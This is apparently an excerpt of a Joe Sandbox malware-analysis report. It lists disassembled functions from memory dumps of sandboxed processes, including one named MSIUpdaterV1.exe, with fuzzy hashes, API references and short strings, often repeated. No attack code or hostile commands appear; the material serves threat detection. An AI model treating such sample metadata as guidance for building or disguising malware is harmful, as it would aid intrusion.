Instruction ID: 54bdf6697bdfc4675c620143ee8ebe8a76fa78a9fd32d3906fa244718456485f
Opcode Fuzzy Hash: 7418e0e1384547442ea4a8b7ec76872519cb0adc0c24b9f66c5e9dd94d5ac3e6
Instruction Fuzzy Hash: 6A91D272900A2A9BCB26DF28C896BAAF3B4FF05314F05025DE815DB690D731AD55CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 003CAF10 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 258COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 003CB0F0
___std_fs_directory_iterator_advance@8.LIBCPMT ref: 003CB13E

Strings

., xrefs: 003CB110

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: ___std_fs_directory_iterator_advance@8
String ID: .
API String ID: 2610647541-248832578
Opcode ID: 7418e0e1384547442ea4a8b7ec76872519cb0adc0c24b9f66c5e9dd94d5ac3e6
Instruction ID: 54bdf6697bdfc4675c620143ee8ebe8a76fa78a9fd32d3906fa244718456485f
Opcode Fuzzy Hash: 7418e0e1384547442ea4a8b7ec76872519cb0adc0c24b9f66c5e9dd94d5ac3e6
Instruction Fuzzy Hash: 6A91D272900A2A9BCB26DF28C896BAAF3B4FF05314F05025DE815DB690D731AD55CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 004AA870 Relevance: 5.4, Strings: 4, Instructions: 423COMMON

Download Yara Rule

Strings

@!29, xrefs: 004AACDA
4oST, xrefs: 004AAB42
|@], xrefs: 004AACB4
4oST, xrefs: 004AAD6C

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID:
String ID: 4oST$4oST$@!29$|@]
API String ID: 0-901387583
Opcode ID: 5780e21fd8d5802d3e1b3702b4d8c2ff62d560f7bc3f0af107ed2c93c40f1b01
Instruction ID: 23aa8f2febcddf9eea37ff31d1328aef5f2547ff4de786d3f558461f43a83bad
Opcode Fuzzy Hash: 5780e21fd8d5802d3e1b3702b4d8c2ff62d560f7bc3f0af107ed2c93c40f1b01
Instruction Fuzzy Hash: CA22E2B4D002599FDB25CF98D981BEEBBB1BF08310F24419AE909B7351D7306A81CF66

Uniqueness

Uniqueness Score: -1.00%

Function 003CB750 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 003CB90C
___std_exception_destroy.LIBVCRUNTIME ref: 003CB922

Strings

(+V, xrefs: 003CB7A1

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: (+V
API String ID: 4194217158-1030211554
Opcode ID: bd72dc89a86a40be9318ed2475282cd25c1099ccb2ba7c176c60ff990578f9ad
Instruction ID: aded74ec0cba0dedf779341e6383873008a53dc22fa9dabd611e7b5a495d099e
Opcode Fuzzy Hash: bd72dc89a86a40be9318ed2475282cd25c1099ccb2ba7c176c60ff990578f9ad
Instruction Fuzzy Hash: 5251AF71D047489FDB11DFA8C906BAEBBB4FF11314F14426DE850AB382E7B55A44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003CB750 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 003CB90C
___std_exception_destroy.LIBVCRUNTIME ref: 003CB922

Strings

(+V, xrefs: 003CB7A1

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: (+V
API String ID: 4194217158-1030211554
Opcode ID: bd72dc89a86a40be9318ed2475282cd25c1099ccb2ba7c176c60ff990578f9ad
Instruction ID: aded74ec0cba0dedf779341e6383873008a53dc22fa9dabd611e7b5a495d099e
Opcode Fuzzy Hash: bd72dc89a86a40be9318ed2475282cd25c1099ccb2ba7c176c60ff990578f9ad
Instruction Fuzzy Hash: 5251AF71D047489FDB11DFA8C906BAEBBB4FF11314F14426DE850AB382E7B55A44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003CBF10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 003CC0AC
___std_exception_destroy.LIBVCRUNTIME ref: 003CC0C2

Strings

L1V, xrefs: 003CBF1D

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: L1V
API String ID: 4194217158-3264503493
Opcode ID: 84cdb04eb8571fc7ec0f321d69f8090a48353e34f9e819ce85125c0936fd32fd
Instruction ID: ade7bafa2438a231f1b7af31cbea1d51d96fce4f2a3ea1de7ca324dba1e24119
Opcode Fuzzy Hash: 84cdb04eb8571fc7ec0f321d69f8090a48353e34f9e819ce85125c0936fd32fd
Instruction Fuzzy Hash: 2151BDB1C05248EFDB01DF98D945BDEFBB4AB15304F24426DE814AB382E7B55A48CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003CBF10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 003CC0AC
___std_exception_destroy.LIBVCRUNTIME ref: 003CC0C2

Strings

L1V, xrefs: 003CBF1D

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: L1V
API String ID: 4194217158-3264503493
Opcode ID: 84cdb04eb8571fc7ec0f321d69f8090a48353e34f9e819ce85125c0936fd32fd
Instruction ID: ade7bafa2438a231f1b7af31cbea1d51d96fce4f2a3ea1de7ca324dba1e24119
Opcode Fuzzy Hash: 84cdb04eb8571fc7ec0f321d69f8090a48353e34f9e819ce85125c0936fd32fd
Instruction Fuzzy Hash: 2151BDB1C05248EFDB01DF98D945BDEFBB4AB15304F24426DE814AB382E7B55A48CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003FBF5B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

CatchIt.LIBVCRUNTIME ref: 003FC066

Strings

RCC, xrefs: 003FBF9A
MOC, xrefs: 003FBF92

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: Catch
String ID: MOC$RCC
API String ID: 78271584-2084237596
Opcode ID: 2b0d35522f07d5ababa9b7bceffdafa35381f778537743ebf3788dba0bfa72ef
Instruction ID: 63b1e36da136742d5df1bd10ba624cf242237e6a33abd80cedb8951ec40fcc87
Opcode Fuzzy Hash: 2b0d35522f07d5ababa9b7bceffdafa35381f778537743ebf3788dba0bfa72ef
Instruction Fuzzy Hash: B341497190020DEFCF16DF94CE81AEEBBB5BF48304F1A8159FA0866261D735DA91DB50

Uniqueness

Uniqueness Score: -1.00%

Function 003FBF5B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

CatchIt.LIBVCRUNTIME ref: 003FC066

Strings

RCC, xrefs: 003FBF9A
MOC, xrefs: 003FBF92

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: Catch
String ID: MOC$RCC
API String ID: 78271584-2084237596
Opcode ID: 2b0d35522f07d5ababa9b7bceffdafa35381f778537743ebf3788dba0bfa72ef
Instruction ID: 63b1e36da136742d5df1bd10ba624cf242237e6a33abd80cedb8951ec40fcc87
Opcode Fuzzy Hash: 2b0d35522f07d5ababa9b7bceffdafa35381f778537743ebf3788dba0bfa72ef
Instruction Fuzzy Hash: B341497190020DEFCF16DF94CE81AEEBBB5BF48304F1A8159FA0866261D735DA91DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0039ADDD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0039B623
___raise_securityfailure.LIBCMT ref: 0039B70B

Strings

8 :, xrefs: 0039B618

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8 :
API String ID: 3761405300-2259783722
Opcode ID: 11ff387ea5ddf4968e30f2f0f0627fc1a1932ccb6f60ddb72764734b3d591682
Instruction ID: 33bb61a0bf0e4c018fc6b8dcad020a7615f03c003e4137a66e2be81fde224d8e
Opcode Fuzzy Hash: 11ff387ea5ddf4968e30f2f0f0627fc1a1932ccb6f60ddb72764734b3d591682
Instruction Fuzzy Hash: 8C21A3B4640200AED717DF19F955F617BACBB4A318F10D02AE508CB3A0EBB4AA85CF44

Uniqueness

Uniqueness Score: -1.00%

Function 003918F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 003918F5
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0039193A

Part of subcall function 0039934E: _Yarn.LIBCPMT ref: 0039936D
Part of subcall function 0039934E: _Yarn.LIBCPMT ref: 00399391

Strings

bad locale name, xrefs: 00391948

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 9eab6506cc471633409f174b7b2e6dbffcc4abad84cfc222b42d0ed87bae5056
Instruction ID: 35c43b91ec2d30b773d5f224af1a7eefcf9b5d24a322dbcc25ffee3b0f45e758
Opcode Fuzzy Hash: 9eab6506cc471633409f174b7b2e6dbffcc4abad84cfc222b42d0ed87bae5056
Instruction Fuzzy Hash: 7EF017A0515B508ED371DF798804783BEE0AF29314F048A1EE5CAC7A82E375E508CBA6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MSIUpdaterV1.exePID: 4412, Parent PID: 1044COMMON

Non-executed Functions

Function 0013130E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,0013162C,00000002,00000000,?,?,?,0013162C,?,00000000), ref: 001313A7
GetLocaleInfoW.KERNEL32(?,20001004,0013162C,00000002,00000000,?,?,?,0013162C,?,00000000), ref: 001313D0
GetACP.KERNEL32(?,?,0013162C,?,00000000), ref: 001313E5

Strings

ACP, xrefs: 0013132C
OCP, xrefs: 00131362

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: bd1f1b52752325e0553f8661e4e957f9b596c0724e389092557f342cfcdf6319
Instruction ID: 688f05a158076e5ad2598cf3e114172c321d6bfb8e1defe6b37219364f139a85
Opcode Fuzzy Hash: bd1f1b52752325e0553f8661e4e957f9b596c0724e389092557f342cfcdf6319
Instruction Fuzzy Hash: 1421A172605205BADB358F65CD40AAB73ABBB54F70F5A8524E90ADBA04F732DD41C350

Uniqueness

Uniqueness Score: -1.00%

Function 001314E3 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 00128EFA: GetLastError.KERNEL32(?,?,001248B4,?,00122038,0000000F,?,00000003,0012059B,00121FAA,?,?,?,?,?,00000000), ref: 00128EFE
Part of subcall function 00128EFA: SetLastError.KERNEL32(00000000,?,00000003,0012059B,00121FAA,?,?,?,?,?,00000000,00122038,00000000,00000000,00000000,00000000), ref: 00128FA0

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 001315EF
IsValidCodePage.KERNEL32(00000000), ref: 00131638
IsValidLocale.KERNEL32(?,00000001), ref: 00131647
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0013168F
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 001316AE

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 41260606225f982f4a5c6f3cef257e6c7e3d508ee0c0b8f989ec9c0197835619
Instruction ID: ce39d71c0c47af69d87d7696363be69d5cb4c0c1cb7727b0e58c8f51800ac642
Opcode Fuzzy Hash: 41260606225f982f4a5c6f3cef257e6c7e3d508ee0c0b8f989ec9c0197835619
Instruction Fuzzy Hash: 545170B1A00209AFDF10DFA5DC41ABE77B8BF59701F084469F915EB191E7B0DA44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00180D50 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd13e52dc3baf3ca0046bbd133d940de6b673a3fb8009cc91da3ec5da1511bb5
Instruction ID: 352e7a529ccacf04d39a5f92ad36ee693f0fbb175a07a4de3adaa6160413fd82
Opcode Fuzzy Hash: cd13e52dc3baf3ca0046bbd133d940de6b673a3fb8009cc91da3ec5da1511bb5
Instruction Fuzzy Hash: A1024C72E01219ABDF14DFA8C8846AEF7F5FF48314F248269E519E7340D731AA468F90

Uniqueness

Uniqueness Score: -1.00%

Function 00180D50 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd13e52dc3baf3ca0046bbd133d940de6b673a3fb8009cc91da3ec5da1511bb5
Instruction ID: 352e7a529ccacf04d39a5f92ad36ee693f0fbb175a07a4de3adaa6160413fd82
Opcode Fuzzy Hash: cd13e52dc3baf3ca0046bbd133d940de6b673a3fb8009cc91da3ec5da1511bb5
Instruction Fuzzy Hash: A1024C72E01219ABDF14DFA8C8846AEF7F5FF48314F248269E519E7340D731AA468F90

Uniqueness

Uniqueness Score: -1.00%

Function 00127D08 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00127D95

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 94ca38b4c9fa21947792df0c2af9e2f487aded66817c04c9dfecda15d806a1a0
Instruction ID: df88dbb59a28b5d5951b9b140831e61fffbd1cabf2fabd08ee15442d0898f246
Opcode Fuzzy Hash: 94ca38b4c9fa21947792df0c2af9e2f487aded66817c04c9dfecda15d806a1a0
Instruction Fuzzy Hash: CCB18A3290D2659FDB25CF68D8817FFBBA5EF15300F1581AAE814AB381D7349D11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0012E66D Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 0012E708
FindNextFileW.KERNEL32(00000000,?), ref: 0012E783
FindClose.KERNEL32(00000000), ref: 0012E7A5
FindClose.KERNEL32(00000000), ref: 0012E7C8

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: edae3a7e8a97db963dda1c36be496957de453b09cb40e8e991b757f24c6e4c19
Instruction ID: 0bd3c62df460aae3e48b34e32175c383be92a385b1fe2180f9c17275012a5416
Opcode Fuzzy Hash: edae3a7e8a97db963dda1c36be496957de453b09cb40e8e991b757f24c6e4c19
Instruction Fuzzy Hash: 9D41C472A00239AFDF24DF64EC899AAB7F9EB94304F0041A5E405D7184F7309E94CB90

Uniqueness

Uniqueness Score: -1.00%

